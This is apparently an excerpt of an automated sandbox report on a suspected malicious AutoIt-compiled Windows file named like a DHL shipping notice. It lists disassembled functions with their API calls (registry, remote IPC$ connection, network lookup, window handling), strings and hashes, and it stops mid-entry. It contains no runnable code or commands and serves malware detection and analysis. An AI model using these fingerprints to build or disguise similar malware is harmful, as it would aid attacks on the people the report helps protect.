                                                                                        • Instruction ID: 7bff85f136f78167d9c4db6965b99471e934d3fbaf5cac4eb5fa33cec5c5d996
                                                                                        • Opcode Fuzzy Hash: a5b1a5ef4e7fcce6fe65d7c11d093a45bc890cf7971bc180c53de776c401df15
                                                                                        • Instruction Fuzzy Hash: 00218970604605AFE7205F60EDC9F2E3BA9EF49745F241038F102C22B1DB719E519B66
                                                                                        Function 00C06A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C20957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C06B0C,?,00008000), ref: 00C20973
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C06BAD
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C06CFA
                                                                                          • Part of subcall function 00C0586D: _wcscpy.LIBCMT ref: 00C058A5
                                                                                          • Part of subcall function 00C2363D: _iswctype.LIBCMT ref: 00C23645
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 537147316-1018226102
                                                                                        • Opcode ID: 9d320839cdbfea8be1980dfc450dcd7bc87f7f0efc4883047e376a6feff2867d
                                                                                        • Instruction ID: 35ecba1fc61bb03b17b97f4e05f94ac7e8ce702d833bc1f1d4503987fc986f7f
                                                                                        • Opcode Fuzzy Hash: 9d320839cdbfea8be1980dfc450dcd7bc87f7f0efc4883047e376a6feff2867d
                                                                                        • Instruction Fuzzy Hash: F8029D705083419FC724EF24C881AAFBBE5EF99314F14492DF496972E2DB30DA49DB52
                                                                                        Function 00C62D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62D50
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C62DDD
                                                                                        • GetMenuItemCount.USER32(00CC5890), ref: 00C62E66
                                                                                        • DeleteMenu.USER32(00CC5890,00000005,00000000,000000F5,?,?), ref: 00C62EF6
                                                                                        • DeleteMenu.USER32(00CC5890,00000004,00000000), ref: 00C62EFE
                                                                                        • DeleteMenu.USER32(00CC5890,00000006,00000000), ref: 00C62F06
                                                                                        • DeleteMenu.USER32(00CC5890,00000003,00000000), ref: 00C62F0E
                                                                                        • GetMenuItemCount.USER32(00CC5890), ref: 00C62F16
                                                                                        • SetMenuItemInfoW.USER32(00CC5890,00000004,00000000,00000030), ref: 00C62F4C
                                                                                        • GetCursorPos.USER32(?), ref: 00C62F56
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00C62F5F
                                                                                        • TrackPopupMenuEx.USER32(00CC5890,00000000,?,00000000,00000000,00000000), ref: 00C62F72
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C62F7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3993528054-0
                                                                                        • Opcode ID: 3c128a5253738066f541097172a270371cb06cf63bfd228862c3b4effd66e8e4
                                                                                        • Instruction ID: ace8b1c01833481a49fee3c797d945d2cfb3943ec1590339b7ea2aece4af9692
                                                                                        • Opcode Fuzzy Hash: 3c128a5253738066f541097172a270371cb06cf63bfd228862c3b4effd66e8e4
                                                                                        • Instruction Fuzzy Hash: 7E71F470605A15BBEB319F54DCC9FAABF64FF04324F10022AF625AA1E0C7726D20DB95
                                                                                        Function 00C577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • _memset.LIBCMT ref: 00C5786B
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C578A0
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C578BC
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C578D8
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C57902
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C5792A
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C57935
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5793A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1411258926-22481851
                                                                                        • Opcode ID: 15c378c92e32bd55ff22c06a9a4b3c0491312c5583fe6df70b89ac453b0dc30e
                                                                                        • Instruction ID: 2dbed3da5580a77ddfc0c88a55e289104172d61bb839fd580bd00d606e558c96
                                                                                        • Opcode Fuzzy Hash: 15c378c92e32bd55ff22c06a9a4b3c0491312c5583fe6df70b89ac453b0dc30e
                                                                                        • Instruction Fuzzy Hash: 6F412976C14229ABCF15EBA4EC45DEEB778BF04304F004229F915B31A1DB316E49DBA4
                                                                                        Function 00C80E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: 7e90cbc7d03c01bff2656df82f276ceee45f59f4bbc53c9cb2cda2371d34fa70
                                                                                        • Instruction ID: bbfdda1530a03f82dce4fa2951082846e70a0726c0487e94aff0198f11011dfc
                                                                                        • Opcode Fuzzy Hash: 7e90cbc7d03c01bff2656df82f276ceee45f59f4bbc53c9cb2cda2371d34fa70
                                                                                        • Instruction Fuzzy Hash: B8416D7110025A8BCF60EF50E895AEF3764FF12308F644465FE651B692DB30AE1AEB60
                                                                                        Function 00C874BB Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C8755E
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00C87565
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C87578
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C87580
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C8758B
                                                                                        • DeleteDC.GDI32(00000000), ref: 00C87594
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00C8759E
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C875B2
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C875BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: @U=u$static
                                                                                        • API String ID: 2559357485-3553413495
                                                                                        • Opcode ID: bf346c4891501f8b843c2ce0582606d935180995bfb1485560d9ee516e8b8e2b
                                                                                        • Instruction ID: 3daf5b1e414bce84799fa9becda1259a46d75a48743eb90440213e2990b41a19
                                                                                        • Opcode Fuzzy Hash: bf346c4891501f8b843c2ce0582606d935180995bfb1485560d9ee516e8b8e2b
                                                                                        • Instruction Fuzzy Hash: 1D316C32104214BBDF12AF64DC08FDE3B69EF49324F210329FA25961A0D731D912DBA8
                                                                                        Function 00C5F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C3E2A0,00000010,?,Bad directive syntax error,00C8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C5F7C2
                                                                                        • LoadStringW.USER32(00000000,?,00C3E2A0,00000010), ref: 00C5F7C9
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • _wprintf.LIBCMT ref: 00C5F7FC
                                                                                        • __swprintf.LIBCMT ref: 00C5F81E
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C5F88D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1506413516-4153970271
                                                                                        • Opcode ID: 3b45ce6ce4ae872466df55223502b530710289e9d0257d26ddad1a76f55d196a
                                                                                        • Instruction ID: efa69afb750b07a1698812968f35a967f1200b86832023ba678966a87b646646
                                                                                        • Opcode Fuzzy Hash: 3b45ce6ce4ae872466df55223502b530710289e9d0257d26ddad1a76f55d196a
                                                                                        • Instruction Fuzzy Hash: 23217C3290021EFFCF15EF90CC0AEEE7739BF18304F040469F515660A2EA31AA59EB55
                                                                                        Function 00C652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                          • Part of subcall function 00C07924: _memmove.LIBCMT ref: 00C079AD
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C65330
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C65346
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C65357
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C65369
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C6537A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_memmove
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 2279737902-1007645807
                                                                                        • Opcode ID: 2a123aa6335c033cc851b67e37f9462f14a923aa6edaccc651fea715def799a6
                                                                                        • Instruction ID: b006f0921251b95ed239035fb7b0346257d0b2a89e28cbf2d975c3fb0bd515f2
                                                                                        • Opcode Fuzzy Hash: 2a123aa6335c033cc851b67e37f9462f14a923aa6edaccc651fea715def799a6
                                                                                        • Instruction Fuzzy Hash: AD118231E501697AD724B761CC4ADFF7B7CEB91F44F100539B411A21E1EEA01D09C6B0
                                                                                        Function 00C646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 208665112-3771769585
                                                                                        • Opcode ID: 5ca127a4a6d1d9579c913526eaa3f25123dbcf19bbeb4cdb5e5397e51e5700fa
                                                                                        • Instruction ID: 74a5278c6f4de2c53f52bab25b0051cc1c822e4e732dce64f7aaf09b93156b4a
                                                                                        • Opcode Fuzzy Hash: 5ca127a4a6d1d9579c913526eaa3f25123dbcf19bbeb4cdb5e5397e51e5700fa
                                                                                        • Instruction Fuzzy Hash: 7E11B431504114AFDB28AB70AC8AFEE77BCEF02711F1401BAF455960A1EF759AC2DB54
                                                                                        Function 00C6D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C6D5EA
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C6D67D
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00C6D691
                                                                                        • CoCreateInstance.OLE32(00C92D7C,00000000,00000001,00CB8C1C,?), ref: 00C6D6DD
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C6D74C
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00C6D7A4
                                                                                        • _memset.LIBCMT ref: 00C6D7E1
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00C6D81D
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C6D840
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00C6D847
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C6D87E
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00C6D880
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 1c09c9afd4908b27387b6370eb19f5d4f628a7573240cb6ec4bea6492bf56548
                                                                                        • Instruction ID: f05869bc15d8aaf9990bffe2976c3c2f075f0e09786fbfb2a98114fd93aeff6b
                                                                                        • Opcode Fuzzy Hash: 1c09c9afd4908b27387b6370eb19f5d4f628a7573240cb6ec4bea6492bf56548
                                                                                        • Instruction Fuzzy Hash: C7B11E75A00109AFDB14DF64C888EAEBBB9FF49314F148469F90AEB261DB30ED45DB50
                                                                                        Function 00C5C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00C5C283
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C5C295
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C5C2F3
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00C5C2FE
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C5C310
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C5C364
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00C5C372
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00C5C383
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C5C3C6
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00C5C3D4
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C5C3F1
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C5C3FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 6c785cb29542a6027a8813bad964517c87eaee8e2aec58764160ba2b9dd3d7f8
                                                                                        • Instruction ID: 4aeeb0546d88fe90c6da89acd55493172dca4a74c6c27ed56c0993d09a00b03e
                                                                                        • Opcode Fuzzy Hash: 6c785cb29542a6027a8813bad964517c87eaee8e2aec58764160ba2b9dd3d7f8
                                                                                        • Instruction Fuzzy Hash: 48517075B00305AFDB08CFA9DD89BAEBBB6EB88311F14812DF915D72A0D7709E448B14
                                                                                        Function 00C0201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C02036,?,00000000,?,?,?,?,00C016CB,00000000,?), ref: 00C01B9A
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C020D3
                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C0216E
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00C3BCA6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C3BCD7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C3BCEE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C016CB,00000000,?,?,00C01AE2,?,?), ref: 00C3BD0A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C3BD1C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 2af17e5426906cef2e1898a25da04be2e8d3ab611c39bd033858ab3ea00b2617
                                                                                        • Instruction ID: 0ebb009c3b77ab04252b2f97385a9afa23472b54abf0e8f86597aeaccee4539f
                                                                                        • Opcode Fuzzy Hash: 2af17e5426906cef2e1898a25da04be2e8d3ab611c39bd033858ab3ea00b2617
                                                                                        • Instruction Fuzzy Hash: 84617731520B10DFDB359F15D94CB2AB7F2FB40316F60852DE6928A9A0C7B0BD91EB90
                                                                                        Function 00C021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        • GetSysColor.USER32(0000000F), ref: 00C021D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: 44f8f2d7e7169ed569479db2da88d86bb824d78d6d35b0f85bc53b1d8288e833
                                                                                        • Instruction ID: 7d1858f8d7f8e01d8fe8a9bfd8fec8feaccc6cfad33b2050db9fbd8c681c5a4f
                                                                                        • Opcode Fuzzy Hash: 44f8f2d7e7169ed569479db2da88d86bb824d78d6d35b0f85bc53b1d8288e833
                                                                                        • Instruction Fuzzy Hash: 02419131100140EBDB255F68DC8CBBD3B65EB46331F244269FE758A1E1C7318E82DB25
                                                                                        Function 00C6A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
